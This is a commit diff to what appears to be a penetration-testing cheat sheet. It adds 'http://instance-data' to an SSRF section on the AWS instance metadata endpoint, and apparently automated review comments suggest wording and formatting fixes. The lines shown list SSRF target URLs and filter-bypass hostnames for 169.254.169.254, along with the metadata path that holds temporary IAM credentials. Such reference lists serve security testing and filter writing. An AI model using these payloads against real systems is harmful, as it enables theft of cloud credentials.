Update AWS SSRF tips

Added http://instance-data
Techbrunch 2020-03-11 15:20:51 +01:00 committed by GitHub
parent c20f84d09c
commit 3abf2aff2a
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

@ -394,7 +394,7 @@ https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brut
### SSRF URL for AWS Bucket
[Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories)
Interesting path to look for at `http://169.254.169.254`
Interesting path to look for at `http://169.254.169.254` or `http://instance-data`
```powershell
Always here : /latest/meta-data/{hostname,public-ipv4,...}
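
Review bot: the changed sentence "Interesting path to look for at ..." now offers `http://instance-data` next to `http://169.254.169.254` without saying what it is, while the second hunk files the same value under "DNS record". State here that it is a hostname form of the same base, so the two places agree and readers writing filters for the metadata endpoint know that matching the literal IP alone does not cover it. Since the line is being touched anyway, "Interesting path" could become "Interesting paths", as a list of paths follows.
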
@ -405,6 +405,7 @@ Temporary AWS credentials : /latest/meta-data/iam/security-credentials/
DNS record
```powershell
http://instance-data
http://169.254.169.254
http://metadata.nicob.net/
http://169.254.169.254.xip.io/
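
Review bot: the new `http://instance-data` entry at the top of the "DNS record" block is written without a trailing slash, while `http://metadata.nicob.net/` and `http://169.254.169.254.xip.io/` carry one; pick one form for the list. The block also gives no hint of how this entry differs from the two external domains below it, and the raw `http://169.254.169.254` sits under the same "DNS record" label, so a one-line comment per entry (or splitting names from the literal address) would make the list easier to use when building an allow or deny rule. The `powershell` fence tag does not match the content, which is a plain list of URLs.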